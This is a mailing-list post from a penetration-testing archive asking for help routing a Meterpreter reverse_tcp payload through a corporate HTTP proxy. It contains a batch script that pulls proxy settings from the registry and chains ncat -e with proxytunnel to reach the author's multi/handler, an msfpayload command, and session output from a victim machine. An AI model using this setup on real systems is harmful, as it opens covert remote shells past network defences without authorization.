Penetration Testing mailing list archives
Tunelling Meterpreter connections through HTTP/S Proxy servers
From: "Sherif Eldeeb" <archeldeeb () gmail com>
Date: Sat, 3 Jul 2010 08:54:57 +0300
I hit a dead end and help is appreciated."Already asked the metasploit list but still stuck". I've been trying the past few days to get a meterpreter reverse_tcp exe to connect back through an http proxy, and I had no idea that it's going to be that difficult "for me", my approach was including another tunneling program that will listen at a local port for meterpreter's connection and handle the proxy bypassing, a batch file that will automate the process, then packing the whole thing with IExpress. Meterpreter connect locally ==> proxy bypassing program ==> PROXY SERVER ====|Internet|===> exploit/mutli/handler And I've been "partially" successful so far and feel like almost there. Here's the scenario: -MS ISA 2006 firewall & web proxy. -Outbound ports allowed : only 80 & 443 through webproxy, 110, 25 and 21 with some kind of protocol filtering. -Inbound open ports: none, externally exposed Services & servers: none. -Solution must be valid if a restricted user executed the program. Long story short, Here's what I found so far: -for those who didn't try before, Just using LPORT as 80 or 443 doesn't work because of the web proxy, it even made the meterpreter.exe grow in memory usage to more than 1.5gb and HDD swapping like crazy, CPU 100%. -Using port 110 or 25 initially connects, but gets dropped immediately by the firewall's protocol filter when it detects that the data being sent is not actually what it should be. -Reverse_https & reverse_http payloads are not working as discussed earlier. TUNNELING EXPERIMENTS: I will not list what didn't work for me, but only "proxytunnel" looked like the one with promising results, but had two serious drawbacks: 1.You have to define the company's proxy server IP address and port number, which I do not know, So I used "REG" command to extract the data from registry. 2.It works with STDIN & STDOUT "not listening on ports AFAIK": I used "ncat -c" to listen on the local port and redirect the connection to the proxytunnel.exe Here's the bat file that did both: ==========CODE========== @echo off for /f "tokens=3 delims=^ " %%a IN ('reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v ProxyServer ^| find "Proxy"') DO set PRXY = %%a ncat -k -l 127.0.0.1 4455 -e "proxytunnel.exe -q -N -p %prxy% -d MyMultiHandlerServer:443" ==========CODE========== Proxytunnel "-q" quiet "-N" use NTLM auth. "-p" Proxyserver "-d" multi/handler_server:port And then make msfpayload windows/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=4455, and putting the programs together in one folder, then execute the payload.exe. Guess what? It Works! Sort of :( ========= msf exploit(handler) > [*] Sending stage (748032 bytes) to 66.55.229.36 [*] Meterpreter session 1 opened (MyMultiHandlerServer:443 -> 66.55.229.36:64206) at 2010-06-20 07:40:47 +0000 sessions -i 1 [*] Starting interaction with 1... meterpreter > sysinfo Computer: VICTIM-PC OS : Windows Vista (Build 6002, Service Pack 2). Arch : x86 Language: en_US meterpreter > sysinfo Computer: VICTIM-PC OS : Windows Vista (Build 6002, Service Pack 2). Arch : x86 Language: en_US meterpreter > ls [-] Error running command ls: Rex::TimeoutError Operation timed out. meterpreter > sysinfo [-] Error running command sysinfo: Rex::TimeoutError Operation timed out. ========= As you can see, it connects, interacts, then connection dies after a short while for some reason, the payload.exe, ncat.exe and proxyserver.exe are all still running, at the isa monitor it's still indicating that the connection is established. same when executing any command like "run winenum" it starts the commands and records the results, but after 15 to 20 commands, it just dies and times out. Away from meterpreter, if I run "ncat -l 443" at the attacking box and "C:\
proxytunnel.exe -q -N -p proxyserver:8080 -d attacking:443" at the victim's
machine, *connection gets past the Proxy*, bidirectional and NEVER gets dropped, though it's a useless chat program. Any help is appreciated, really. Thanks in advance, Sherif. WHAT DIDN'T WORK: GNU-HTTPtunnel: HTS didn't port-forward nicely to multi/handler Stunnel: has a nice looking icon in the notification area :) didn't try connectivity Ncat --ssl: for some reason it doesn't accept -e & --ssl together, which might help. ------------------------------------------------------------------------ This list is sponsored by: Information Assurance Certification Review Board Prove to peers and potential employers without a doubt that you can actually do a proper penetration test. IACRB CPT and CEPT certs require a full practical examination in order to become certified. http://www.iacertification.org ------------------------------------------------------------------------
Current thread:
- Tunelling Meterpreter connections through HTTP/S Proxy servers Sherif Eldeeb (Jul 03)